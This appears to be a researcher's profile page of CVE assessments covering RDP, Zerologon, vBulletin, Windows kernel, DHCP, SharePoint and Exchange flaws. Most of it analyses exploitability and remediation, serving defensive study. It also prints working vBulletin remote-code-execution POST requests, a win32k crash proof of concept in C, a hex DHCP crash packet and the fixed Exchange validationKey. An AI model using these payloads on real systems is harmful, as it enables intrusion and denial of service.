zeroSteiner (216)

Last Login: October 27, 2020
Assessments
49
Score
216
3rd Place

zeroSteiner's Contributions (49)

Sort by:
Filter by:
5
Ratings
Technical Analysis

Analysis performed using tcpip.sys from Windows 10 v1909 x64 (sha256: f2a0cb717ccbe7e7ff93ccadaeb23df4a8a76b386b6623fee1b5a975c3f16bfa)

Overview

A crafted IPv6 Router Advertisement frame can a stack based buffer overflow due to an improper calculation of the RDNSS
(type 25) option. When an RDNSS option uses a crafted length with an even value the parser will interpret the last 8
bytes of it as the start of the next option. When combined with fragmentation, this can cause a overflow due to the size
of the mis-interpreted header not being validated.

Exploitability Analysis

The public PoCs reliably reproduce this vulnerability to trigger a bug check condition. The relevant function is
tcpip!Ipv6pHandleRouterAdvertisement which handles the parsing logic and is the function whose local variable is
overflown. The public PoCs use a Route Information (type 24) option to actually perform the overflow. In this case the
actual overflow is performed by a call to NdisGetDataBuffer at Ipv6pHandleRouterAdvertisement+0xb8a01.

In this call, the third parameter Storage is a pointer to the stack at location rbp+0xb8. From the documentation:

(Storage is) a pointer to a buffer, or NULL if no buffer is provided by the caller. The buffer must be greater than or
equal in size to the number of bytes specified in BytesNeeded . If this value is non-NULL, and the data requested is
not contiguous, NDIS copies the requested data to the area indicated by Storage.

Since Storage is non-NULL, non-contiguous (due to the packet fragmentation), it is used as a destination buffer and
wOptLength bytes are copied to it. In this context, wOptLength is the length of the option in the original data
times 8. With a length of 176 (field value 0x16), the stack cookie at offset rbp+0x260 will be overwritten. As the
function returns, this leads to a Bug Check when the stack cookie is checked at
tcpip!Ipv6pHandleRouterAdvertisement+0x10e0. The value of the stack cookie is also XORed with the value of the stack
pointer (rsp) so knowing the value would not be sufficient to replace it in the overwrite.

After the overflow operation has taken place, the loop continues to process the following options:

  • Type 3 (Prefix Information)
  • Type 24 (Route Information)
  • Type 25 (RDNSS)
  • Type 31 (DNS Search List Option)

(see: http://blog.pi3.com.pl/?p=780)

From the /GS (Buffer Security Check) documentation:

A vulnerable parameter is allocated before the cookie and local variables. A buffer overrun can overwrite these
parameters. And code in the function that uses these parameters could cause an attack before the function returns and
the security check is performed.

After inspecting the logic for each of the four types that will be processed, there were no identified references to
values which could be controlled by an attacker using the overflow. While the handler for the Prefix Information (type
3) option uses a 32 byte buffer which could be controlled by the attacker starting at rbp+0x200, it is memset to
zero at Ipv6pHandleRouterAdvertisement+0xa19.

There are no other references to the space between rbp+0x1b8 (&Storage) and rbp+0x260 (the stack cookie) that are
accessible from this late in the Ipv6pHandleRouterAdvertisement function.

An alternative vector could potentially utilize a Search List (type 31) option to trigger the overflow. This function
makes a similar call to NdisGetDataBuffer with a location on the stack. In this case the attacker can overflow the
buffer starting at rbp+0x90 and overwrite the stack cookie at rbp+0x190. This function is less interesting as there
appear to be no usable references before the return and there is no looping logic due to the handler and overflow being
a subroutine of Ipv6pHandleRouterAdvertisement.

7
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

Over the past couple of years (2018-2020) attacks against RDP have become more and more common. Recent improvements in attacker-related tooling can be contributed to generally available and mature projects targeting RDP and a number of remotely exploitable vulnerabilities being disclosed.

Memory Corruption Flaws

One of the best examples of this is CVE-2019-0708 (AKA BlueKeep) which was an unauthenticated, remotely exploitable use-after-free in RDP. This particular vulnerability was able to be developed to yield semi-reliable code execution and is widely utilized by attackers. Following this, CVE-2019-1182 (AKA DejaBlue) was discovered as well. This particular bug was a heap corruption within the server’s dynamic channel handling. While this vulnerability has not to this date had exploitat code released, it also contributed to the popularity of RDP vulnerability research in 2019.

Why RDP As An Attack Surface?

Regardless of code execution-type vulnerabilities, RDP is an attractive attack surface for the following reasons:

  • It’s commonly accessible internally and relatively accessible externally
  • It’s common that non-administrative users can authenticate to it, offering an initial foothold to attackers
  • The service can yield version information about the host operating system
  • Established sessions can be hijacked using publicly documented tools techniques and procedure (TTPs)
  • In addition to offering a graphical interface to the desktop session, it can also be used to mount drives and transfer files

When compared to an interface such as SMB for the purpose of lateral movement, RDP offers a much larger degree of freedom for the attacker. Using SMB, attackers are able to use a small number of techniques to achieve code execution such as PSexec. Alternatively, RDP through it’s graphical interface and file transfer capabilities offers attackers near limitless possibilities. This number of possibilities directly improves the attackers evasion capabilities as they can easily adapt and shift techniques that are blocked through whatever sort of endpoint protection maybe present. Furthermore, SMB as an attack surface is very well know and widely documented. For those reasons, and the fact that there are choke points from an attacker workflow perspective, there are mature defenses and controls in place (such as event monitoring) that are either not applicable to or are less effective when compared to RDP.

4
Ratings
Technical Analysis

The Zerologon vulnerability is related to the misuse of the AES-CFB8 cipher within the MS-NRPC (Netlogon) service. The result is that 1 in 256 authentication attempts using an all-zero plaintext value will result in an all-zero ciphertext. This means that a user can authenticate as a target system without knowledge of the shared secret which is the hash of the client’s computer account password.

The affected service by default uses a very high (around 40,000-50,000) TCP port. This port is dynamic since it is a DCERPC service. An attacker must know this value in order to connect to and communicate with the Netlogon service. To find it, an attacker can use the mapping service on tcp/135 to query the services by GUID (12345678-1234-abcd-ef00-01234567cffb). While it is possible to leverage the vulnerability using a named pipe interface over SMB (tcp/445), it requires authentication which sort of defeats the purpose of the vulnerability.

Most public PoCs (including the Metasploit Framework module) leverage the vulnerability to authenticate to the Netlogon service and then changes the machine account password to an empty / blank value. This value has the LM/NTLM hash value of aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0. This technique relies on using the NetrServerPasswordSet2 function which encrypts the new computer account password with the session key that also misuses the AES-CFB8 cipher. After exploitation the attacker can use this hash value to authenticate to the target Domain Controller using the machine account (the NetBIOS name with a $ suffix, e.g. WIN2019$). After leveraging this vulnerability to reset the machine account password, it’s important that the attacker restore the original value to prevent authentication failures to the target Domain Controller.

This vulnerability does not appear to affect Windows Server 2008 which was not patched by Microsoft.

3
Ratings
Technical Analysis

A vulnerability exists within the NtGditretchBlt system call that can be leveraged to trigger an out of bounds read access within win32kfull!vStrWrite04. The bug manifests itself when the Special Pool setting is enabled through the driver verifier utility.

An attacker would use this flaw to escalate their privileges to that of the local system through this kernel mode exploit.

Exploitation would be very difficult, a successful attack would need an information leak as well as reliable control over the win32k heap which is more difficult on Windows 10 than previous versions of Windows due to type isolation (added in RS3) and the KASLR improvements (added in the Anniversary Update). The win32k subsystem is however available as an attack surface on all versions of Windows making it a very high-value target.

#include <Windows.h>

int main()
{
    BITMAPINFO bi = {{0x28, 0x2, 0xfffffffffffffffb, 0x2, 0x4, 0x0, 0x0, 0x0, 0x0, 0x0, 0x2}};
    char out[0x1000] = {0};
    HDC r0 = CreateCompatibleDC(0x0);
    HBITMAP r1 = CreateDIBitmap(r0, 0x0, 0x6, &out, &bi, 0x0);
    SelectObject(r0, r1);
    StretchBlt(r0, 0x0, 0x0, 0x8, 0x8, r0, 0x0, 0x0, 0xffffffffffffffeb, 0x4, 0xee00e6);

    return 0;
}

Original PoC provided by Check Point Research, see: https://cpr-zero.checkpoint.com/about/

4
Ratings
  • Attacker Value
    High
  • Exploitability
    Very High
Technical Analysis

A vulnerability exists in vBulletin that can allow the protections originally put in place to address CVE-2019-16759 to be bypassed. The vulnerability exists in how the patch handles child templates that are rendered by the widget_php template. A detailed write up which analyzes the patch and describes the issue regarding the child templates was posted to blog.exploitee.rs by the original author who discovered the vulnerability.

Successful exploitation involves an HTTP POST request and yields code execution in the context of the web application user. Due to the nature of templates, the result of the evaluation is included in the rendered output, allowing attackers to retrieve the output of their commands which makes the vulnerability more useful.

POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
Host: 192.168.250.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 168

subWidgets%5b0%5d%5btemplate%5d=widget_php&subWidgets%5b0%5d%5bconfig%5d%5bcode%5d=echo%20shell_exec%28base64_decode%28%27ZWNobyBra3hmenJLeQ%3d%3d%27%29%29%3b%20exit%3b

This vulnerability was fixed in vBulletin version 5.6.3, with patches released for versions 5.6.0, 5.6.1 and 5.6.2.

To temporarily remediate the vulnerability, delete the “widget_php” module by following these steps:

  1. Put the site into debug mode.
  2. Log into the AdminCP.
  3. Go to Styles > Style Manager.
  4. Open the template list for the MASTER style.
  5. Scroll to the bottom where it says Module Templates.
  6. Highlight the widget_php module.
  7. Click the Revert Button.
3
Ratings
  • Attacker Value
    High
  • Exploitability
    Very High
Technical Analysis

This vulnerable allows an unauthenticated attacker to run arbitrary PHP code or operating system commands on affected versions of the vBulletin web application. The vulnerability, which was also discovered by Zenofex, is identified as CVE-2020-7373 and is effectively a bypass for a previously patched vulnerability identified as CVE-2019-16759. Administrators running vBulletin should patch this one immediately.

Example POST request that would trigger the vulnerability:

POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
Host: 192.168.249.2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 168

subWidgets%5b0%5d%5btemplate%5d=widget_php&subWidgets%5b0%5d%5bconfig%5d%5bcode%5d=echo%20shell_exec%28base64_decode%28%27ZWNobyB3elV4d2VJag%3d%3d%27%29%29%3b%20exit%3b
2
Ratings
Technical Analysis

A vulnerability exists within Windows that can allow file signature validation to be bypassed. This would allow an attacker to load and execute PE files without having signed them, possibly masquerading as a legitimate signature. This would be useful if the system the attacker is on requires signatures for all files or if the attacker wanted to load a library into a process where signatures are enforced.

This would not grant elevated privileges without being combined with an additional primitive.

While this is being actively exploited in the wild, at this time there are few public details on the vulnerability.

4
Ratings
Technical Analysis

A buffer overflow exists within GRUB2 affecting how it handles it’s configuration file. An exception occurs when the contents of the configuration are too large for the buffer that is incorrectly handled causing the contents to be written anyways, thus over flowing the buffer.

In order to exploit this, an attacker would likely need either:

  • Physical access to an affected device and sufficient time to mount the disk and corrupt / infect the GRUB configuration file
  • Administrative access to running system to corrupt / infect the GRUB configuration file

Successful exploitation of this vulnerability could corrupt the secure boot process and compromise the integrity of the system over all. This would effectively allow the installation and utilization of a bootkit. Developing a weaponized exploit would be aided by the lack of modern memory protections such as address space layout randomization (ASLR).

Patching is a complicated process involving updating the firmware from the vendor and applying a denylist which must be done manually (for now at least).

For more information see the Grubbing Secure Boot the Wrong Way: CVE-2020-10173.

8
Ratings
Technical Analysis

A deserialization vulnerability exists within Microsoft Sharepoint that could allow an attacker to execute code on the server within the context of the service account. The attacker would need to authenticate to Sharepoint and submit a specially crafted POST request to a specific resource that implements the ContactLinksSuggestionsMicroView or InputFormContactLinksSuggestionsMicroView control. The following two resources meet this requirement:

  • /_layouts/15/quicklinks.aspx?Mode=Suggestion
  • /_layouts/15/quicklinksdialogform.aspx?Mode=Suggestion

Alternatively, an attacker with the correct privileges may create a page which implements this.

For more information, see the details analysis posted to srcincite.io by Steven Seeley.

2
Ratings
  • Attacker Value
    Low
  • Exploitability
    Medium
Technical Analysis

The AnyDesk GUI is vulnerable to a remotely exploitable format string vulnerability. By sending a specially
crafted discovery packet, an attacker can corrupt the front end process when it loads or refreshes. While the
discovery service is always running, the GUI frontend must be started to trigger the vulnerability. On
successful exploitation, code is executed within the context of the user who started the AnyDesk GUI.

The public PoC works out of the box on Ubuntu 18.04 x64 but requires some work to update the target for newer versions of Ubuntu and other versions of Linux such as Fedora. While the exploit seems reasonably stable for the first exploitation attempt, the GUI becomes unresponsive and subsequent attempts require restarting the service sudo systemctl restart anydesk and restarting the GUI.

A legitimate discovery frame can be sent to a target host to trigger a response. This can be used by an attacker to verify that the service is running, leak the hostname, and determine the operating system.

1
Ratings
Technical Analysis

A vulnerability exists with the Windows kernel that can be used to bypass the NULL page mitigation feature that prevents users from allocating the memory that exists at the literal address 0. This is required for exploiting the class of memory corruption vulnerabilities known as NULL Page Dereferece or NULL Pointer Derefernce. This vulnerability would not be useful on it’s own but rather would make exploitation of another vulnerability practical.

In order to leverage this vulnerability, Intel’s SGX functionality must be available on the host. From my testing, the required functionality does not appear to be available from within virtual machines, meaning that a vulnerable environment would likely have to run on hardware. The vulnerability exists within the implementation of the NtCreateEnclave.

The function NtCreateEnclave is exposed through ntdll, was added in Windows 10 v1511 and uses the following signature (according to Process Hacker):

NTSYSAPI
NTSTATUS
NTAPI
NtCreateEnclave(
    _In_ HANDLE ProcessHandle,
    _Inout_ PVOID* BaseAddress,
    _In_ ULONG_PTR ZeroBits,
    _In_ SIZE_T Size,
    _In_ SIZE_T InitialCommitment,
    _In_ ULONG EnclaveType,
    _In_reads_bytes_(EnclaveInformationLength) PVOID EnclaveInformation,
    _In_ ULONG EnclaveInformationLength,
    _Out_opt_ PULONG EnclaveError
    );

NtCreateEnclave will return 0xc00000bb (STATUS_NOT_SUPPORTED) if the necessary SGX capabilities are unavailable, making identification relatively easy.

I flag this as “No useful access” because it’s most valuable as an exploit primitive, and does not provide any access or information on it’s on.

References: https://twitter.com/waleedassar/status/1270550282695585792

2
Ratings
Technical Analysis

A vulnerability exists within splwow64.exe that can be exploited via an LPC to execute code within the context of that process. The splwow64.exe process is started when a 32-bit process on a 64-bit version of Windows attempts to print. The process is spawned as the same user and thus, the code would be executed as that user. Because of this, the vulnerability could not be used to escalate privileges but rather is limited to use as a sandbox escape from a Low integrity process (such as an Internet Explorer window) to a High integrity process. I rate this as low attacker value because the utility class is pretty limited to use as a sandbox escape.

Exploiting this vulnerability involves opening a handle to it and creating a shared section that when combined with the LPC can be leveraged into a write-what-where primitive. This can then be used with knowledge of the the base address of key DLLS to overwrite a pointer within the .data section that can be referenced for controlled code execution.

This vulnerability reportedly still affects 64-bit versions of Windows 7 and has no public PoC code.

Analysis based on Chronicles of a Sandbox Escape: Deep Analysis of CVE-2019-0880,

2
Ratings
Technical Analysis

This particular vulnerability is related to insecure permissions created on the install location of the SmartDraw application. This can be leveraged for privilege escalation (or persistence) by dropping an executable within this directory. A scheduled task will run the executable as the user who installed SmartDraw. While it’s possible to install SmartDraw as a non-Admin user, it is most likely to be installed with administrative privileges, allowing the attacker to run within this context.

It should be noted that this vulnerability has been patched, however installations that were installed before the patch was released will remain vulnerable after upgrading. In order to remediate the vulnerability and correct the permissions issue, the application must first be uninstalled and then the patched version must be reinstalled in it’s place.

See the original disclosure here.

2
Ratings
Technical Analysis

A vulnerability exists within the Win32k subsystem (provided by the win32k.sys, win32kbase.sys, and win32kfull.sys drivers) on Windows 10 that can be leveraged to trigger a Use-After-Free condition where by freed memory is used by win32kbase!GreUnlockRegion.

From my testing of the public PoC, I found this bug unreliable to trigger. Even with Driver Verifier enabled and standard settings (including SpecialPool) enabled, no exception and Blue Screen occurred. From reading through the PoC it looks like there is some kind of edge condition (possibly a race) that requires the PoC to re-execute itself (via CreateProcessA) to attempt to trigger the vulnerability.

Do to the unreliable nature of the PoC and the difficulty of replacing the freed memory within the heap, I believe this vulnerability would be difficult to exploit reliably. Successful execution however would take place within the Windows Kernel, effectively offering a complete compromise of the affected system.

3
Ratings
Technical Analysis

A vulnerability exists in how Microsoft’s XPS documents are processed using .NET that can be leveraged to execute code using a deserialization attack. XPS files are effectively ZIP archives containing multiple member, of which ones .fdoc, and .fpage can be used as triggers. While this vulnerability was patched in May of 2020, it’s related to a similar vulnerability patched in January of 2020, which patched the same usage of the XPS document’s .fdseq member file types.

The default XPS viewer in Windows does not use .NET to render the XPS document making it unaffected by this vulnerability. A vulnerable application would need to be configured to process a maliciously crafted XPS document. Due to this, it is unclear if in practice this vulnerability will require user interaction or authentication to leverage.

See: https://www.mdsec.co.uk/2020/05/analysis-of-cve-2020-0605-code-execution-using-xps-files-in-net/

4
Ratings
Technical Analysis

A vulnerability exists within PathCchCanonicalize that can be leveraged by a malicious RDP server to write files on a connected RDP client system. The vulnerability is related to how forward and back slash characters are processed and is related to the older CVE-2019-0887 in the sense that this vulnerability is a bypass for the mitigation which it introduced.

Exploiting this vulnerability would involve an attacker configuring a malicious RDP server and then tricking a client to connect to it, authenticate to it and then initiate a copy and paste operation from the malicious server to their client system.

3
Ratings
  • Attacker Value
    Medium
  • Exploitability
    Low
Technical Analysis

The following analysis is based on CODESYS 3.5.15.20:

  • Installer file: CODESYS 3.5.15.20.exe, SHA-1 b26884d2a4ded94e80d49eaaef863250fcf4684e
  • Library file: CmpWebServerHandlerV3.dll, SHA-1 a04f572029b22defdf4f92e72d93d1017b8d9211

CODESYS v3 Web Server is vulnerable to a heap-based buffer overflow which can be triggered by an unauthenticated attacker with a specially crafted HTTP request. The vulnerability is due to an integer overflow. This can be used by an attacker to overwrite the heap buffer directly following the under-sized allocation. The web server is only present when a web-based visualization has been configured by the operator.

The vulnerable overwrite occurs in a call to CMUtlSafeMemCpy from CmpWebServerHandlerV3+3a16. This can be used to corrupt the following heap structure, however a crash occurs 2 stack frames up form this within the same request atCmpWebServerHandlerV3+14ac. This is due to a call to memcpy use the original size field without the overflow operation applied to it. Due to the nature of integer overflow, this value is very high, typically 0xffffffff (though any value -92 / 0xffffffa4 through -1 / 0xffffff could be used to trigger the overflow.

There are two branches that could be taken to avoid this condition for reliable code execution:

  • CmpWebServerHandlerV3+146e — This branch is based on the return value from the previous function call and is boiled up from the overwrite operation. This branch can not be used while still trigger the overwrite.
  • CmpWebServerHandlerV3+1498 — This branch could potentialy be used if the return value from CmpWebServer+6bc0 could be forced to be 0. This path warrants further analysis.

Without avoiding the memcpy, reliable code execution seems unlikely due to the nature of the vulnerability. Typically heap overwrites require manipulation of the heap that would not be possible if the server crashes after the overwrite while processing the HTTP request. While most modules loaded into the process have ASLR available, there are a small handful of application-specific ones that do not that could be viable candidates for use in a ROP chain.

Successful exploitation would yield code execution within the context of the CODESYSControlServer.exe process which, in PLC development scenarios at least, runs with user privileges.

2
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Medium
Technical Analysis

This CVE collectively describes 5218 unique crashes that were reported to Samsung by a Google Project Zero researcher. The crashes occur within the Skia library and are related to the processing of Qmage images. The Qmage image format was developed by a third-party company but was added to the Skia Android library on Samsung phones. These bugs can be triggered remotely and without interaction by sending MMS messages to the target device.

The vulnerability does not affect all Android devices, only those with the modified Skia library distributed by Samsung on their phones. It’s likely that other exploit delivery scenarios are viable but may require user interaction to trigger rendering the image.

Successful exploitation requires bypassing ASLR which reportedly can be achieved remotely by sending multiple messages to the target. Further details on this aspect of the exploit are not currently public and contribute to the complexity of weaponizing a PoC for this vulnerability. Successfully exploiting the vulnerability yields code execution within the context of the exploited process. In the case of the messenger application, this could be used to leak text messages.

4
Ratings
  • Attacker Value
    High
  • Exploitability
    Very High
Technical Analysis

Apache Shiro v1.2.4 is vulnerable to a Java deserialization vulnerability. An
unauthenticated user can submit a YSoSerial payload to the Apache Shiro web
server as the value to the rememberMe cookie. This will result in code
execution in the context of the web server.

The YSoSerial CommonsCollections2 payload is known to work and is the one
leveraged by the Metasploit module.

2
Ratings
Technical Analysis

An out of bounds dereference exists within the kernel-mode function win32kfull!vStrWrite01 that can be triggered from user-mode by calling gdi32!StretchBlt with a specially sized canvas and a specific raster operation (SRCERASE).

StretchBlt(hdc, 0x0, 0x2, 0x100, 0x1, hdc, 0x0, 0x0, 0x400, 0x8000, SRCERASE)

The vulnerability could be leveraged as an information leak.

2
Ratings
Technical Analysis

A vulnerability in Apache server versions 2.4.17–2.4.38 caused by an out-of-bounds array access can lead to an arbitrary function call. An attacker can trigger this to execute code in the context of the parent Apache process which often runs as root. In order for the exploit to trigger however, the Apache process must gracefully restart. This can be done on demand using apache2ctl graceful, but is also done automatically once at day by the logrotate utility (according to the original disclosure).

This exploit is a Local Privilege Escalation (LPE) vulnerability, so an attacker would already need to have some control on the system. This likely could be achieved through some kind of application vulnerability depending on what the Apache server is running.

1
Ratings
  • Attacker Value
    Low
  • Exploitability
    Medium
Technical Analysis

The Metasploit Framework’s libnotify plugin contains a vulnerability which can allow an attacker to execute an operating system command as the user running Metasploit. Exploiting the vulnerability requires the target user to have the libnotify plugin loaded, and then to load a malicious file using msfconsole’s db_import command.

The root of the problem is the way in which arguments are passed to Ruby’s system function to execute the operating system command. A maliciously crafted service name can add additional arguments and commands to this call, leading to code execution. The vulnerable code path will only be hit the first time the service is reported, i.e. repeatedly loading the malicious file with db_import will not result in the command being executed multiple times unless the user deletes the service between attempts.

This vulnerability was patched in https://github.com/rapid7/metasploit-framework/pull/13266.

5
Ratings
Technical Analysis

A vulnerability exists in how SMB3 Compressed data is handled that can be leveraged to write data out of normal bounds. This vulnerability is triggered by sending a specially crafted COMPRESSION_TRANSFORM_HEADER as defined in subsections of MS-SMB2 2.2.42. The OriginalCompressedSegmentSize value triggers an integer overflow when it is set to a large value. This vulnerability could be triggered prior to authenticating to the server.

When details of this vulnerability were first made public, the vulnerability was unpatched. The official recommendation from Microsoft was to disable SMB3 compression as a temporary fix.

Due to modern mitigation technologies, exploiting this vulnerability remotely to obtain code execution is non-trivial. Public PoCs do exist which trigger the vulnerable code path, and one serves as an example of using this vulnerability in the context of a local privilege escalation technique.

3
Ratings
Technical Analysis

This vulnerability exists within the Apache Struts OGNL method dispatch routine. An attacker can submit a specially crafted HTTP request to a vulnerable web server. Specifically an attacker can taint the name parameter passed to OgnlUtil::getValue().

Exploitation of this vulnerability would lead to code execution within the context of the Java process powering the server. An indicator of compromise will be present in the logs at the DEBUG level. This IOC will look like a malformed value in the Executing action method = message.

The default configuration is not vulnerable. The alwaysSelectFullNamespace option must be enabled. This can be done by adding <constant name="struts.mapper.alwaysSelectFullNamespace" value="true" /> to the struts.xml configuration file.

2
Ratings
Technical Analysis

A use-after-free vulnerability exists within the Microsoft Remote Desktop Protocol stack. The vulnerability is triggered when a T.125 ConnectMCSPDU packet’s maxChannelIds field is less than or equal to 5. This vulnerability can be levered prior to authenticating to the RDP service and can lead to code execution within the context of the Windows Kernel.

Extensive technical details were published in the original disclosure.

The major hurdle to reliable code execution is properly grooming the kernel heap.

4
Ratings
Technical Analysis

A missing boundary check causes versions of OpenSSL 1.0.1 – 1.0.1f to be vulnerable to an out of bounds read as part of an SSL Heartbeat message. This vulnerability can be leveraged without authenticating in many instances to leak sensitive information such as passwords and private keys. Due to the vulnerability being in the OpenSSL library, exploits are implementation specific and may require changes to implement the applicable protocol.

The vulnerability was fixed in this patch.

1
Ratings
Technical Analysis

This vulnerability is a Use-After-Free in the Microsoft VBScript engine. Originally exploited in the wild, attackers used a technique to force the exploit code to be opened with Internet Explorer by embedding a resource into a Rich Text File (RTF). This technique would allow attackers to more reliably exploit targets, even when a non-IE browser was configured as the default.

The Use After Free is related to arbitrary VB object. When two arrays reference the same object, and one array is deleted, the second array is left with a dangling reference.

2
Ratings
Technical Analysis

A .NET deserialization vulnerability exists within SharePoint that can be exploited remotely. The vulnerability was actively being exploited in the wild around the May 2019 time frame. Per the ZDI Advisory the vulnerability is due to a lack of validation on user supplied data to an encoder class which can be leveraged to deserialize attacker-supplied data resulting in remote code execution.

Per the Microsoft advisory:

Exploitation of this vulnerability requires that a user uploads a specially crafted SharePoint application package to an affected version of SharePoint.

A public PoC has been released.

The initial vulnerability is triggered via an HTTP POST request to /_layouts/15/Picker.aspx?PickerDialogType=.

1
Ratings
Technical Analysis

The SharePoint WorkFlow component is affected by a vulnerability within .NET which can be abused to run arbitrary code when compiling XOML files. An authenticated user would need to issue an HTTP request with crafted XOML-formatted data (for which there are public examples). The vulnerability was patched for on-premises installations of SharePoint on January 2020.

A correct crafted XOML request will result in extra C# code being written to a temporary file on disk as part of the exploitation process. This is how an OS command is then executed.

Both patched and unpatched systems will return compiler error information in the XML response to the HTTP request. A patched system will have an error stating "Compilation failed. The type name: ... is not a valid language-independent type name.". Malformed requests will include relevant information in the compiler error text, which is usually a character escaping issue. For best results escape all characters that are non-alphanumeric as unicode like \u####.

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    High
Technical Analysis

A .NET deserialization vulnerability exists within Exchange when configured with Unified Messaging (UM). An attacker needs to be able to authenticate as an Exchange user with a configured UM voice mailbox. After doing so they utilize Exchange Web Services (EWS) to upload a malicious payload before calling the target user to leave a voice mail resulting in code execution. The target user does not need to listen to the voice mail in order for the payload to be executed.

2
Ratings
Technical Analysis

A crafted .RESX file can be used to execute code when deserialized by .NET reflector. The attacker would need to generate the .RESX file, compile it into a .RESOURCES file, before combining that with a C# executable to create a malicious binary.

The binary would then need to be opened by the target user in .NET reflector and inspected (it looks like by expanding a node within the tree view) in order to cause the resource to be deserialized and the code to be executed. The resulting execution context would be as the user inspecting the file.

6
Ratings
Technical Analysis

Analysis performed using ipnathlp.dll from Windows Server 2019 x64 (sha256: c5bfdd192eaac8ffa8c0ee9c5fbb719eb739518a0635dc5cba42f52ab7efefa9)

Overview

CVE-2020-0662 is a stack based buffer overflow occurring in svchost.exe due to an unchecked size argument to a memcpy call in ipnathlp.dll!DhcpAddArpEntry. The size argument is restricted to 0-255 inclusive as it must fit in a uint8_t variable. The size argument for the affected memcpy call is taken from the “Hardware address length” field from a DHCP/BootP message.

In order to hit the vulnerable code path and trigger the bug, the size (hardware address length) field must be sufficiently large, and the DHCP option 53 / 0x34 (DHCP Message Type) must be omitted.

The following protocon script can be used to trigger the crash:

# Dynamic Host Configuration Protocol
#     Message type: Boot Request (1)
#     Hardware type: Ethernet (0x01)
#     Hardware address length: 255
#     Hops: 0
#     Transaction ID: 0x5df26992
#     Seconds elapsed: 1
#     Bootp flags: 0x0000 (Unicast)
#     Client IP address: 0.0.0.0
#     Your (client) IP address: 0.0.0.0
#     Next server IP address: 0.0.0.0
#     Relay agent IP address: 0.0.0.0
#     Client MAC address: Vmware_84:05:fd (00:0c:29:84:05:fd)
#     Client hardware address padding: 00000000000000000000
#     Server host name not given
#     Boot file name not given
#     Magic cookie: DHCP
#     Option: (255) End
#         Option End: 255

set encoding hex
send 0101ff005df269920001000000000000000000000000000000000000000c298405fd0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000063825363ff
exit

On a Windows Server 2019 installation, this process is protected by stack cookies making exploitation non-trival. The cookie value would need to be leaked and the service which hosts the DLL is not configured to automatically start. To make a system vulnerable, an interface must be marked as “Shared”. To do this:

  1. Open the power user menu with Win+X and select “Network Connections”
  2. From the Network Connections window, select “Change adapter options”
  3. Right click an adapter which has an internet connection and select “Properties”
  4. Navigate to the “Sharing” tab and check “Allow other network users to connect through this computer’s Internet connection”
  5. Click “OK”

Vulnerable Code Path

  1. ipnathlp!DhcpProcessMessage
  2. ipnathlp!DhcpProcessBootpMessage
    • Only invoked if the DHCP Message Type option is omitted
  3. ipnathlp!DhcpAddArpEntry
    • Second memcpy call is the vulnerability, the size argument is
      under attacker control

Crash Notes

The target process uses stack canaries, so overwriting the stack would
require a leak. The original structure is a MIB_IPNET_ROW2
instance. Of note here is that the PhysicalAddressLength field is
located after the PhysicalAddress field and is set before the memcpy
call. This could allow an attacker to overwrite the this field.

Immediately following this operation, the row is passed to
iphlpapi!CreateIpNetEntry2 where the PhysicalAddressLength field
is subjected to proper boundary checking (<= 0x20).

Windows 7 Notes

Windows 7 does not appear to be a viable exploit target because the affected memcpy call is not present due to an older API being used. There is a memcmp instruction to which the size parameter can be controlled but this would result in a OOB read which is much less useful.

9
Ratings
Technical Analysis

This is a serialization bug in the Exchange Control Panel component of Microsoft Exchange server. The write up by ZDI outlines an exploitation path in grate detail how the vulnerability would be leveraged to gain command execution as NT_AUTHORITY\SYSTEM on the server.

The root of the issue is that the validationKey is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.

The important values from the write up are:

validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF
validationalg = SHA1

I anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the Domain Users group and have a configured mailbox in Exchange.

Thew ViewState must be transfered within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.

2
Ratings
  • Attacker Value
    Medium
  • Exploitability
    High
Technical Analysis

This vulnerability leverages a TOCTOU vulnerability in the “Standard Collector Service” used by Visual Studio. If an attacker can change the contents of an ETL file by winning a race condition, the file can then be written to an arbitrary location using a symlink. This can then be used to load an attacker controlled DLL into another process.

4
Ratings
  • Attacker Value
    Low
  • Exploitability
    High
Technical Analysis

This vulnerability can be used to trigger a memory exhaustion attack on affected routers within the CDP process. Once the process is out of memory it will crash and the router will reboot causing a denial of service condition for the network. Exploiting this vulnerability would not yield access to sensitive information or bypass segmentation (unless an improperly configured fail over setup is in place).

An attacker would need to be on the local area network, attached to the vulnerable router. This is due to CDP traffic not being forwarded across network boundaries. An attacker leveraging this vulnerability would likely either be physically in the building or have compromised a host which is physically in the building.

2
Ratings
  • Attacker Value
    Low
  • Exploitability
    High
Technical Analysis

This is a heap buffer overflow vulnerability in the parser of CDP packets in the Cisco 8000 Series IP cameras. Successfully exploiting this vulnerability would lead to a denial of service condition or potentially access to the video feed. The affected binary reportedly lacks ASLR support, which would aid efforts to produce a functioning exploit.

An attacker would need to be on the local area network as the affected IP camera This is due to CDP traffic not being forwarded across network boundaries. An attacker leveraging this vulnerability would likely either be physically in the building or have compromised a host which is physically in the building.

4
Ratings
  • Attacker Value
    Low
  • Exploitability
    High
Technical Analysis

This vulnerability can reportedly only be used to trigger a denial of service condition on VoIP phones, potentially in a wide spread fashion. This would likely disrupt business but would not grant the attacker access to any sensitive information. Business in which affected VoIP phones are used to generate revenue such as commercial and support call centers.

